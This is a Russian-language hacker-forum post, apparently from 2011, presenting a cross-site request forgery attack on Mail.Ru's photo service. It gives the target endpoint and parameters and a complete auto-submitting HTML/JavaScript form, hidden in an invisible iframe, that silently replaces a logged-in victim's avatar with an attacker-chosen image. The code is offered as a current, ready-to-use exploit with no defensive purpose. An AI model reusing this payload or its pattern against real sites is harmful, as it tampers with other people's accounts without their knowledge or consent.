XSRF изменение аватарки (актуально) - Форум - Stas'M Corp.
Stas'M Corp.
Главная | XSRF изменение аватарки (актуально) - Форум | Регистрация | Вход
 
Понедельник, 27.02.2017, 09:39
Приветствую Вас Гость | RSS
| ENG | RUS
Форма входа

Информация о тебе:

IP-адрес: 50.16.79.246
Браузер: Неизвестен
Основные разделы
Мини-чат
Loading Загрузка сообщений...
Наш опрос
Что делаете на нашем сайте?
Всего ответов: 833
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Administrator, Phantom, b@bskEnízm 
Форум » Хакерский форум » Mail.Ru » XSRF изменение аватарки (актуально)
XSRF изменение аватарки (актуально)
AdministratorДата: Понедельник, 30.05.2011, 18:11 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 89
Награды: 39
Репутация: 50
Статус: Offline
XSRF уязвимость позволяет атакующему изменить основное фото (аватару) пользователя.
Создаётся специальный HTML файл с формой и с использованием JavaScript.

Образец запроса:

URL:http://foto.mail.ru/cgi-bin/photo/addphoto
Метод:POST
Кодировка:Windows-1251
Поля запроса:
myphoto1
kavt1
add1
upload_byURL
Поля формы:
upl-swurl
URLСсылка на изображение

Образец HTML кода, использующего эту уязвимость:

Code
<form id="avatarko" method="POST" target="ava_to" action="http://foto.mail.ru/cgi-bin/photo/addphoto?myphoto=1&kavt=1&add=1&upload_by=URL">
<input type="hidden" name="upl-sw" value="url">
<input type="hidden" name="URL" value="http://realfijinews.files.wordpress.com/2009/09/obamaspeaking.jpg">
<input type="submit" value="Submit">
</form>
<iframe name="ava_to" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script type="text/javascript">
document.getElementById('avatarko').submit();
</script>


Stas'M
 
Форум » Хакерский форум » Mail.Ru » XSRF изменение аватарки (актуально)
Страница 1 из 11
Поиск:

Веб приложения
Пожертвование / Donate
WMWebMoney transferZ358077191062
WMWebMoney transferE208225402366
WMWebMoney transferR303537803958
WMWebMoney transferB345247247920
Reg.ruReg.ru transfer9900126333
WUWestern Union transferuse feedback form
BTCBitcoin transferuse feedback form
Друзья сайта

Просим вас посещать сайты наших друзей! Они достойны такого же внимания как и мы!

Пользователи

Пользователи онлайн:
Статистика

Copyright © Stas'M Corp. 2017Хостинг от uCoz